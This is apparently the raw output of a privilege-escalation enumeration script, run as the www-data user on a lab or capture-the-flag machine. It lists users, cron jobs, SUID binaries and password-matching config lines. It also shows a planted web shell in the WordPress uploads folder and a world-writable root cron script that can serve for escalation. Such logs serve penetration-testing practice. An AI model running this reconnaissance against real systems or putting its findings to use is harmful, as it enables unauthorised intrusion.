-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 32
drwxr-xr-x 2 root root 4096 Jun 3 2016 .
drwxr-xr-x 100 root root 12288 Jun 7 2016 ..
-rw-r--r-- 1 root root 102 Jun 3 2016 .placeholder
-rw-r--r-- 1 root root 56 Jun 3 2016 logrotate
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 670 Mar 1 2016 php
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Jun 3 2016 .
drwxr-xr-x 100 root root 12288 Jun 7 2016 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 920 Apr 5 2016 apt-compat
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 383 Mar 8 2016 samba
-rwxr-xr-x 1 root root 214 Apr 12 2016 update-notifier-common
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Jun 3 2016 .
drwxr-xr-x 100 root root 12288 Jun 7 2016 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Jun 3 2016 .
drwxr-xr-x 100 root root 12288 Jun 7 2016 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Jun 3 2016 .
drwxr-xr-x 100 root root 12288 Jun 7 2016 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 211 Apr 12 2016 update-notifier-common
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
20:26:22 up 6:17, 0 users, load average: 0.09, 0.10, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+] Super Users Found:
root
[+] Environment
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/https/blogblog/wp-content/uploads
[+] Root and current user history (depends on privs)
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash
[+] Current User
www-data
[+] Current User ID
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 4096 Jun 3 2016 /var/crash
drwxrwxrwt 2 root root 4096 Jun 7 2016 /var/tmp
drwxrwxrwt 2 root root 4096 May 20 2016 /var/spool/samba
drwx-wx-wt 2 root root 4096 Sep 25 16:09 /var/lib/php/sessions
drwxrwxrwt 7 root root 4096 Sep 25 20:25 /tmp
drwxrwxrwt 2 root root 4096 Sep 25 14:09 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Sep 25 14:09 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Sep 25 14:09 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Sep 25 14:09 /tmp/.X11-unix
drwxrwxrwt 2 root root 4096 Sep 25 14:09 /tmp/.font-unix
drwxrwxrwt 2 root root 40 Sep 25 11:09 /dev/mqueue
drwxrwxrwt 2 root root 40 Sep 25 14:09 /dev/shm
drwxrwxrwt 5 root root 100 Sep 25 14:09 /run/lock
[+] World Writeable Directories for Users other than Root
drwxrwxrwx 2 www-data www-data 4096 Sep 25 20:25 /var/www/https/blogblog/wp-content/uploads
drwxrwxrwx 2 www www 4096 Jun 5 2016 /home/www
[+] World Writable Files
-rw-rw-rw- 1 mysql mysql 39 Sep 25 19:14 /var/www/https/blogblog/wp-content/uploads/Gandoshellllll.php
-rwxrwxrwx 1 www www 0 Jun 3 2016 /etc/authbind/byport/80
-rwxrwxrwx 1 root root 51 Jun 3 2016 /usr/local/sbin/cron-logrotate.sh
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/init.scope/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-sda5.swap/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/inetutils-inetd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/cron.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-cpu\x2ccpuacct.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-disk-by\x2did-ata\x2dVBOX_HARDDISK_VB8810de15\x2d59e8e8c2\x2dpart5.swap/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-memory.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/postfix.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/-.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-perf_event.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/netfilter-persistent.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/atd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/atftpd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-disk-by\x2duuid-9584ec4a\x2d8708\x2d4802\x2d96e6\x2d9e3067074554.swap/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-user-1013.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dnsmasq.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-pids.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-hugetlb.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-net_cls\x2cnet_prio.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-disk-by\x2dpath-pci\x2d0000:00:0d.0\x2data\x2d1\x2dpart5.swap/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-name\x3dsystemd.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-blkio.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-devices.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-user-1028.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-freezer.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/php7.0-fpm.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/run-lxcfs-controllers-cpuset.mount/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/cgroup.event_control
--w--w--w- 1 root root 0 Sep 25 20:18 /sys/fs/cgroup/memory/user.slice/cgroup.event_control
-rw-rw-rw- 1 root root 0 Sep 25 11:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Sep 25 11:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Sep 25 11:09 /sys/kernel/security/apparmor/.replace
-rw-rw-rw- 1 root root 0 Sep 25 11:09 /sys/kernel/security/apparmor/.load
[+] Checking if root's home folder is accessible
[+] SUID/SGID Files and Directories
drwxrwsr-x 2 root mail 4096 Sep 25 15:37 /var/mail
drwx--s--- 2 postfix postdrop 4096 Sep 25 14:10 /var/spool/postfix/public
drwxrwsr-x 2 root staff 4096 Apr 12 2016 /var/local
-rwsr-xr-x 1 root root 36288 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 39560 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 159852 Mar 30 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 48264 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 18216 Jan 17 2016 /usr/bin/pkexec
-rwxr-sr-x 1 root shadow 22000 Mar 29 2016 /usr/bin/expiry
-rwsr-xr-x 1 root root 36288 Mar 29 2016 /usr/bin/newgidmap
-rwsr-sr-x 1 daemon daemon 50748 Jan 14 2016 /usr/bin/at
-rwxr-sr-x 1 root ssh 427536 Apr 16 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 61276 Mar 29 2016 /usr/bin/chage
-rwsr-xr-x 1 root root 53128 Mar 29 2016 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 29 2016 /usr/bin/newgrp
-rwxr-sr-x 1 root tty 26356 Apr 13 2016 /usr/bin/wall
-rwxr-sr-x 1 root crontab 38996 Apr 5 2016 /usr/bin/crontab
-rwsr-xr-x 1 root root 78012 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 22268 Apr 29 2016 /usr/bin/ubuntu-core-launcher
-rwxr-sr-x 1 root utmp 464152 Feb 7 2016 /usr/bin/screen
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/fonts
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/zsh/site-functions
drwxrwsr-x 7 root staff 4096 Jun 3 2016 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/sgml/stylesheet
drwxrwsr-x 6 root staff 4096 Jun 6 2016 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/share/xml/declaration
drwxrwsr-x 3 root staff 4096 Jun 3 2016 /usr/local/lib/python3.5
drwxrwsr-x 2 root staff 4096 Apr 20 2016 /usr/local/lib/python3.5/dist-packages
drwxrwsr-x 4 root staff 4096 Jun 3 2016 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Jun 3 2016 /usr/local/lib/python2.7/site-packages
-rwsr-xr-x 1 root root 513528 Apr 16 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13960 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 38300 Apr 19 2016 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
-rwxr-sr-x 1 root utmp 5480 Mar 11 2016 /usr/lib/i386-linux-gnu/utempter/utempter
-rwsr-xr-- 1 root messagebus 46436 Apr 1 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9760 Jul 26 2015 /usr/lib/authbind/helper
-r-xr-sr-x 1 root postdrop 17716 Apr 13 2016 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 13636 Apr 13 2016 /usr/sbin/postdrop
-rwsr-xr-x 1 root root 34812 Apr 13 2016 /bin/mount
-rwsr-xr-x 1 root root 26492 Apr 13 2016 /bin/umount
-rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 30112 Mar 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38900 Mar 29 2016 /bin/su
-rwxr-sr-x 1 root shadow 38664 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 38684 Mar 16 2016 /sbin/pam_extrausers_chkpwd
drwxr-sr-x 3 root systemd-journal 60 Sep 25 14:09 /run/log/journal
drwxr-s---+ 2 root systemd-journal 100 Sep 25 15:37 /run/log/journal/6bcd20ace5721b4ec51742d557517d58
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/apache2/sites-enabled/000-default.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-enabled/000-default.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/overlayroot.conf:# if not provided or empty, password is randomly generated
/etc/overlayroot.conf:# crypt:dev=/dev/vdb,pass=somepassword,mkfs=0
/etc/overlayroot.conf:# Randomly generated passwords are more secure, but you won't be able to
/etc/overlayroot.conf:# Randomly generated passwords are generated by calculating the sha512sum
/etc/samba/smb.conf:# If you are using encrypted passwords, Samba will need to know what
/etc/samba/smb.conf:# password database type you are using.
/etc/samba/smb.conf:# password with the SMB password when the encrypted SMB password in the
/etc/samba/smb.conf: unix password sync = yes
/etc/samba/smb.conf:# For Unix password sync to work on a Debian GNU/Linux system, the following
/etc/samba/smb.conf: passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
/etc/samba/smb.conf:# This boolean controls whether PAM will be used for password changes
/etc/samba/smb.conf: pam password change = yes
/etc/samba/smb.conf:# password; please adapt to your needs
/etc/samba/smb.conf:; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
/etc/dnsmasq.conf:#dhcp-option=encap:175, 191, pass # iSCSI password
/etc/mysql/my.cnf.fallback:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/mysql/mysql.conf.d/mysqld.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
acl 2.2.52-3 Access control list utilities
acpid 1:2.0.26-1ubuntu2 Advanced Configuration and Power Interface event daemon
adduser 3.113+nmu3ubuntu4 add and remove users and groups
apache2 2.4.18-2ubuntu3 Apache HTTP Server
apache2-bin 2.4.18-2ubuntu3 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.18-2ubuntu3 Apache HTTP Server (common files)
apache2-utils 2.4.18-2ubuntu3 Apache HTTP Server (utility programs for web servers)
apparmor 2.10.95-0ubuntu2 user-space parser utility for AppArmor
apport 2.20.1-0ubuntu2 automatically generate crash reports for debugging
apport-symptoms 0.20 symptom scripts for apport
apt 1.2.10ubuntu1 commandline package manager
apt-utils 1.2.10ubuntu1 package management related utility programs
at 3.1.18-2ubuntu1 Delayed job execution and batch processing
atftpd 0.7.git20120829-2.1 advanced TFTP server
attr 1:2.4.47-2 Utilities for manipulating filesystem extended attributes
authbind 2.1.1+nmu1 Allows non-root programs to bind() to low ports
base-files 9.4ubuntu4 Debian base system miscellaneous files
base-passwd 3.5.39 Debian base system master password and group files
bash 4.3-14ubuntu1 GNU Bourne Again SHell
bcache-tools 1.0.8-2 bcache userspace tools
binutils 2.26-8ubuntu2.1 GNU assembler, linker and binary utilities
bsdutils 1:2.27.1-6ubuntu3 basic utilities from 4.4BSD-Lite
btrfs-tools 4.4-1 Checksumming Copy on Write Filesystem utilities
build-essential 12.1ubuntu2 Informational list of build-essential packages
busybox-initramfs 1:1.22.0-15ubuntu1 Standalone shell setup for initramfs
busybox-static 1:1.22.0-15ubuntu1 Standalone rescue shell with tons of builtin utilities
byobu 5.106-0ubuntu1 text window manager, shell multiplexer, integrated DevOps environment
bzip2 1.0.6-8 high-quality block-sorting file compressor - utilities
ca-certificates 20160104ubuntu1 Common CA certificates
cloud-guest-utils 0.27-0ubuntu24 cloud guest utilities
cloud-initramfs-copymods 0.27ubuntu1 copy initramfs modules into root filesystem for later use
cloud-initramfs-dyn-netconf 0.27ubuntu1 write a network interface file in /run for BOOTIF
console-setup 1.108ubuntu15 console font and keymap setup program
console-setup-linux 1.108ubuntu15 Linux specific part of console-setup
coreutils 8.25-2ubuntu2 GNU core utilities
cpio 2.11+dfsg-5ubuntu1 GNU cpio -- a program to manage archives of files
cpp 4:5.3.1-1ubuntu1 GNU C preprocessor (cpp)
cpp-5 5.3.1-14ubuntu2.1 GNU C preprocessor
crda 3.13-1 wireless Central Regulatory Domain Agent
cron 3.0pl1-128ubuntu2 process scheduling daemon
cryptsetup 2:1.6.6-5ubuntu2 disk encryption support - startup scripts
cryptsetup-bin 2:1.6.6-5ubuntu2 disk encryption support - command line tools
curl 7.47.0-1ubuntu2 command line tool for transferring data with URL syntax
dash 0.5.8-2.1ubuntu2 POSIX-compliant shell
dbconfig-common 2.0.4ubuntu1 framework that helps packages to manage databases
dbconfig-mysql 2.0.4ubuntu1 dbconfig-common MySQL/MariaDB support
dbus 1.10.6-1ubuntu3 simple interprocess messaging system (daemon and utilities)
debconf 1.5.58ubuntu1 Debian configuration management system
debconf-i18n 1.5.58ubuntu1 full internationalization support for debconf
debianutils 4.7 Miscellaneous utilities specific to Debian
dh-python 2.20151103ubuntu1 Debian helper tools for packaging Python libraries and applications
diffutils 1:3.3-3 File comparison utilities
distro-info-data 0.28ubuntu0.1 information about the distributions' releases (data files)
dmeventd 2:1.02.110-1ubuntu10 Linux Kernel Device Mapper event daemon
dmidecode 3.0-2 SMBIOS/DMI table decoder
dmsetup 2:1.02.110-1ubuntu10 Linux Kernel Device Mapper userspace library
dns-root-data 2015052300+h+1 DNS root data including root zone and DNSSEC key
dnsmasq 2.75-1 Small caching DNS proxy and DHCP/TFTP server
dnsmasq-base 2.75-1 Small caching DNS proxy and DHCP/TFTP server
dpkg 1.18.4ubuntu1 Debian package management system
dpkg-dev 1.18.4ubuntu1.1 Debian package development tools
e2fslibs:i386 1.42.13-1ubuntu1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.13-1ubuntu1 ext2/ext3/ext4 file system utilities
eject 2.1.5+deb1+cvs20081104-13.1 ejects CDs and operates CD-Changers under Linux
ethtool 1:4.5-1 display or change Ethernet device settings
